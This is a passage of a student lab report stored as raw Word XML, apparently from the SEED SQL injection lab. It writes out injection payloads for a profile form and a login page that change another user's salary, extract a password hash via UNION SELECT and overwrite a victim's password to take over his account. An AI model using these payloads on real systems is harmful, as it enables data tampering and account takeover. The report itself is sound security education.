        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A7586">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>schema.COLUMNS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A7586">
        <w:t xml:space="preserve">. Then I performed another SQL injection attack on the login page to obtain the column name </w:t>
      </w:r>
      <w:r w:rsidR="009A7586">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">salary </w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t xml:space="preserve">of the table </w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">credential </w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t>by stealing information from the same system table as in the previous step, using t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rial-and-error </w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t>and finally</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> g</w:t>
      </w:r>
      <w:r w:rsidR="005067C2">
        <w:t>ot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the column name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">salary </w:t>
      </w:r>
      <w:r>
        <w:t>that stores an employee’s salary.</w:t>
      </w:r>
      <w:r w:rsidR="00730C6A">
        <w:t xml:space="preserve"> Then I logged in as Alice and performed another SQL injection attack on the ‘Edit Profile’ page to change Alice’s salary from 10000 to 90000. This is done by first end</w:t>
      </w:r>
      <w:r w:rsidR="00E050F0">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00730C6A">
        <w:t xml:space="preserve"> the single quote, followed by an assignment of the new amount of salary, </w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t>followed by</w:t>
      </w:r>
      <w:r w:rsidR="00730C6A">
        <w:t xml:space="preserve"> a filter in</w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t xml:space="preserve"> the WHERE clause in</w:t>
      </w:r>
      <w:r w:rsidR="00730C6A">
        <w:t xml:space="preserve"> order to modify only Alice’s profile. Then I used a hash symbol to comment out the rest of the SQL UPDATE statement logic and consequently end</w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00730C6A">
        <w:t xml:space="preserve"> the query. Finally, I observed that Alice’s salary has been successfully changed to the amount I specified in the attack</w:t>
      </w:r>
      <w:r w:rsidR="009C3727">
        <w:t>, i.e. 90000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A313A2" w14:textId="2034EAD8" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B"/>
    <w:p w14:paraId="292234C4" w14:textId="204F03F2" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B"/>
    <w:p w14:paraId="12570BFF" w14:textId="3073E824" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B"/>
    <w:p w14:paraId="699D70E3" w14:textId="58009D10" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B"/>
    <w:p w14:paraId="2A965E88" w14:textId="65B55A93" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B"/>
    <w:p w14:paraId="25F5FDCF" w14:textId="6916A964" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B"/>
    <w:p w14:paraId="256D4E33" w14:textId="20D84820" w:rsidR="008C051B" w:rsidRDefault="008C051B" w:rsidP="005E428B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453B21E" w14:textId="7E33EE09" w:rsidR="00F02838" w:rsidRDefault="00F02838" w:rsidP="00F02838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact contents filled into each field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FBE3D" w14:textId="22F42C38" w:rsidR="00C04BD5" w:rsidRDefault="00C04BD5" w:rsidP="00C04BD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5130D2" w14:textId="54FD73DB" w:rsidR="00C04BD5" w:rsidRDefault="00C04BD5" w:rsidP="00C04BD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>NICKNAME: ‘, salary = ‘1’ WHERE NAME = ‘Boby’ #</w:t>
      </w:r>
      <w:r w:rsidR="0024083E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76638A8C" w14:textId="00B44E95" w:rsidR="008C051B" w:rsidRDefault="0024083E" w:rsidP="005E428B">
      <w:r>
        <w:tab/>
        <w:t>All other fields are empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20375EF5" w14:textId="0AD52060" w:rsidR="00E22BF5" w:rsidRDefault="00E22BF5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47B8E6" w14:textId="66A618B1" w:rsidR="00E22BF5" w:rsidRDefault="00E22BF5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Boby’s profile before the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49433BD2" w14:textId="3DC524F6" w:rsidR="00E22BF5" w:rsidRDefault="00E22BF5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6AC125" wp14:editId="024F7842">
            <wp:extent cx="2661313" cy="396907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2849" cy="4001189"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27D8EB" w14:textId="6D31AABE" w:rsidR="00E22BF5" w:rsidRDefault="00E22BF5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25701B3C" w14:textId="53C825BF" w:rsidR="00E22BF5" w:rsidRDefault="00E22BF5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP GET request when </w:t>
      </w:r>
      <w:r w:rsidR="00F07F7A">
        <w:t>updating Alice’s profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72E0A0" w14:textId="395A5CAF" w:rsidR="00E22BF5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2679A359" wp14:editId="684EFD5A">
            <wp:extent cx="5943600" cy="847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847090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA26A22" w14:textId="23CE7BE9" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43746027" w14:textId="62998F15" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38130D71" w14:textId="4DF788B5" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C446DBC" w14:textId="583280F0" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24896782" w14:textId="4654A46B" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38346D92" w14:textId="4E5C4591" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E5A91D" w14:textId="3995846B" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3805D044" w14:textId="51F3C806" w:rsidR="00DE17B5" w:rsidRDefault="00DE17B5" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Boby’s profile after the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D6ADF" w14:textId="2CCB2A65" w:rsidR="00DE17B5" w:rsidRDefault="00920736" w:rsidP="00E22BF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61048409" wp14:editId="55B5715F">
            <wp:extent cx="2750024" cy="39909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7334" cy="4016090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8AC273" w14:textId="2552A13A" w:rsidR="00920736" w:rsidRDefault="00920736" w:rsidP="00920736"/>
    <w:p w14:paraId="0DAFECB3" w14:textId="51712F0A" w:rsidR="00E050F0" w:rsidRDefault="00920736" w:rsidP="00E050F0">
      <w:r>
        <w:t>Observations:</w:t>
      </w:r>
      <w:r w:rsidR="00E050F0">
        <w:t xml:space="preserve"> I logged in as Alice and performed an SQL injection attack on the ‘Edit Profile’ page to change Boby’s salary to 1. This is done by first ending the single quote, followed by an assignment of the new amount of salary, </w:t>
      </w:r>
      <w:r w:rsidR="006316CF">
        <w:t xml:space="preserve">followed by </w:t>
      </w:r>
      <w:r w:rsidR="00E050F0">
        <w:t xml:space="preserve">a filter </w:t>
      </w:r>
      <w:r w:rsidR="006316CF">
        <w:t xml:space="preserve">in the WHERE clause </w:t>
      </w:r>
      <w:r w:rsidR="00E050F0">
        <w:t>in order to modify only Boby’s profile. Then I used a hash symbol to comment out the rest of the SQL UPDATE statement logic and consequently end</w:t>
      </w:r>
      <w:r w:rsidR="00082A8D">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00E050F0">
        <w:t xml:space="preserve"> the query. Finally, I observed that Boby’s salary has been successfully changed to the amount I specified in the attack</w:t>
      </w:r>
      <w:r w:rsidR="00BC24F8">
        <w:t>, i.e. 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D693CFE" w14:textId="4955DFC6" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="7E768060" w14:textId="2327CDBA" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="490C0CF2" w14:textId="6E59787A" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="796FD4FB" w14:textId="524A9A58" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="130FF0DF" w14:textId="659858C0" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="2091B15E" w14:textId="104E210B" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="205657D3" w14:textId="2B73EF4D" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="1E8ABB21" w14:textId="4B399357" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0"/>
    <w:p w14:paraId="7AD64CD7" w14:textId="141BBB22" w:rsidR="0090392C" w:rsidRDefault="0090392C" w:rsidP="00E050F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5333F4" w14:textId="256CF8B6" w:rsidR="00B50D16" w:rsidRDefault="00B50D16" w:rsidP="00B50D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact contents filled into each field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E206D" w14:textId="2BB7ADD8" w:rsidR="00CF0687" w:rsidRDefault="00CF0687" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Alice plans to change Boby’s password to her own password. She first performs an attack on the login page to obtain the hashed value of her own password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40950997" w14:textId="309DC2B1" w:rsidR="00CF0687" w:rsidRDefault="00CF0687" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F42DC2A" w14:textId="5F77E8AC" w:rsidR="00CF0687" w:rsidRDefault="00F82812" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>USERNAME</w:t>
      </w:r>
      <w:r w:rsidR="00CF0687">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CF0687">
        <w:t>‘ UNION</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CF0687">
        <w:t xml:space="preserve"> SELECT 0, </w:t>
      </w:r>
      <w:r w:rsidR="00054765">
        <w:t>PASSWORD, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM credential WHERE EID = ‘10000’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB059A" w14:textId="1625E75A" w:rsidR="00F82812" w:rsidRDefault="00F82812" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47292B81" w14:textId="6A30F856" w:rsidR="00F82812" w:rsidRDefault="00F82812" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3FD77" w14:textId="04E44C67" w:rsidR="00F82812" w:rsidRDefault="00F82812" w:rsidP="00F82812">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C3601" w14:textId="77777777" w:rsidR="00F82812" w:rsidRDefault="00F82812" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611CA37A" w14:textId="48386128" w:rsidR="00CF0687" w:rsidRDefault="00F82812" w:rsidP="00CF0687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using the hashed value of the password obtained in step a, Alice performs an attack on her “update profile” page to change Boby’s password to her own password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F415F8" w14:textId="77777777" w:rsidR="00F82812" w:rsidRDefault="00F82812" w:rsidP="00F82812">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E6B19D" w14:textId="52E7ECC3" w:rsidR="0090392C" w:rsidRDefault="00B50D16" w:rsidP="00F82812">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NickName: ‘, password = ‘fdbe918bdae83000aa54747fc95fe0470fff4976’ WHERE NAME </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="00F82812">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672D20D" w14:textId="1DF11511" w:rsidR="006160A5" w:rsidRDefault="006160A5" w:rsidP="00F82812">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C1E692" w14:textId="7C71797E" w:rsidR="006160A5" w:rsidRDefault="006160A5" w:rsidP="00F82812">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>All other fields are empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284EE3A4" w14:textId="757FD0A2" w:rsidR="00720D54" w:rsidRDefault="00720D54" w:rsidP="00F82812">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4373D0AF" w14:textId="684A8125" w:rsidR="00720D54" w:rsidRDefault="00720D54" w:rsidP="00720D54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Alice uses the new password for Boby (i.e. Alice’s own password) to log into the web application as Boby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4964AD" w14:textId="53A8081B" w:rsidR="00720D54" w:rsidRDefault="00720D54" w:rsidP="00720D54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704BC3AE" w14:textId="05193D7A" w:rsidR="00720D54" w:rsidRDefault="00720D54" w:rsidP="00720D54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>USERNAME: Boby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34582639" w14:textId="34BF1553" w:rsidR="00720D54" w:rsidRDefault="00720D54" w:rsidP="00720D54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A1E8F8" w14:textId="4ED188B8" w:rsidR="00720D54" w:rsidRDefault="00720D54" w:rsidP="00720D54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD: seedalice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE1B77" w14:textId="2428B3D0" w:rsidR="00B50D16" w:rsidRDefault="00B50D16" w:rsidP="006160A5"/>
    <w:p w14:paraId="4886EAC2" w14:textId="7AE8F727" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="565E9BD6" w14:textId="068D4693" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="74D9231B" w14:textId="4924BB5E" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="2134E908" w14:textId="05DC9042" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="7996D7DD" w14:textId="2AE439B7" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="1086E1D9" w14:textId="2192F66F" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="1E04C76F" w14:textId="3863AF43" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="6347712F" w14:textId="46CDFBBB" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="673EFEBC" w14:textId="77777777" w:rsidR="00B65DF7" w:rsidRDefault="00B65DF7" w:rsidP="006160A5"/>
    <w:p w14:paraId="5193ED90" w14:textId="7568BFF0" w:rsidR="00B50D16" w:rsidRDefault="00B50D16" w:rsidP="00B50D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E985DFC" w14:textId="6A4DD5AD" w:rsidR="00CA0B2A" w:rsidRDefault="00CA0B2A" w:rsidP="00CA0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The hashed value of Alice’s password obtained from step a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9DC24" w14:textId="68291435" w:rsidR="00A804A3" w:rsidRDefault="00CF0687" w:rsidP="00472496">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2863841F" wp14:editId="2F0D1F0D">
            <wp:extent cx="5943600" cy="36042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0AF9328A" w14:textId="073AA601" w:rsidR="008E625D" w:rsidRDefault="009C38E9" w:rsidP="00472496">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP GET request when updating Alice’s profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF2D4E" w14:textId="0162A7F6" w:rsidR="009C38E9" w:rsidRDefault="009C38E9" w:rsidP="00472496">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="192F2A0E" wp14:editId="01A06581">
            <wp:extent cx="5943600" cy="865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865505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D22E48" w14:textId="4C471BE4" w:rsidR="009C38E9" w:rsidRDefault="009C38E9" w:rsidP="00472496">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F05CAE6" w14:textId="2F410872" w:rsidR="009C38E9" w:rsidRDefault="009C38E9" w:rsidP="00472496">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP GET request when Alice successfully logs in as Boby:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878A83C" w14:textId="0CB11B66" w:rsidR="009C38E9" w:rsidRDefault="009C38E9" w:rsidP="009C38E9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CE0362F" wp14:editId="33A11367">
            <wp:extent cx="5943600" cy="865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865505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0174C7CA" w14:textId="4868704F" w:rsidR="009C38E9" w:rsidRDefault="009C38E9" w:rsidP="009C38E9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CE08BC" w14:textId="77777777" w:rsidR="00590B0F" w:rsidRDefault="00590B0F" w:rsidP="009C38E9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BE491F" w14:textId="77777777" w:rsidR="00590B0F" w:rsidRDefault="00590B0F" w:rsidP="009C38E9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663991A7" w14:textId="77777777" w:rsidR="00590B0F" w:rsidRDefault="00590B0F" w:rsidP="009C38E9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A9578B" w14:textId="5707EDC5" w:rsidR="009C38E9" w:rsidRDefault="009C38E9" w:rsidP="009C38E9">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Alice logs in Boby</w:t>
      </w:r>
      <w:r w:rsidR="00642A60">
        <w:t>’s profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using the updated password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A976BAC" w14:textId="5B1F4547" w:rsidR="00B50D16" w:rsidRDefault="009C38E9" w:rsidP="004453BA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48217B48" wp14:editId="1FB8BAD4">
            <wp:extent cx="4586631" cy="479097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2506" cy="4807553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D3E87" w14:textId="77777777" w:rsidR="008B6F6C" w:rsidRDefault="008B6F6C" w:rsidP="00B50D16"/>
    <w:p w14:paraId="5081CA54" w14:textId="6C9438EF" w:rsidR="00B50D16" w:rsidRDefault="00B50D16" w:rsidP="00B50D16">
      <w:r>
        <w:t>Observations:</w:t>
      </w:r>
      <w:r w:rsidR="004453BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00642A60">
        <w:t xml:space="preserve">The goal is to modify Boby’s password. In </w:t>
      </w:r>
      <w:r w:rsidR="00BE2895">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="00642A60">
        <w:t xml:space="preserve"> case, Alice decides to change Boby’s password to her own password. Since the database stores the hash value of the passwords instead of the plaintext password string, Alice </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00642A60">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00642A60">
        <w:t xml:space="preserve"> find out the hash value of her own password first. The attack is done by first performing an SQL injection attack on the login page to get the hash value of Alice’s password, followed an SQL injection attack on Alice’s “edit profile” page to update Boby’s password with her own using the hash value just obtained. Finally, Alice can log in Boby’s profile with the updated password, i.e., her own password.</w:t>
      </w:r>
    </w:p>
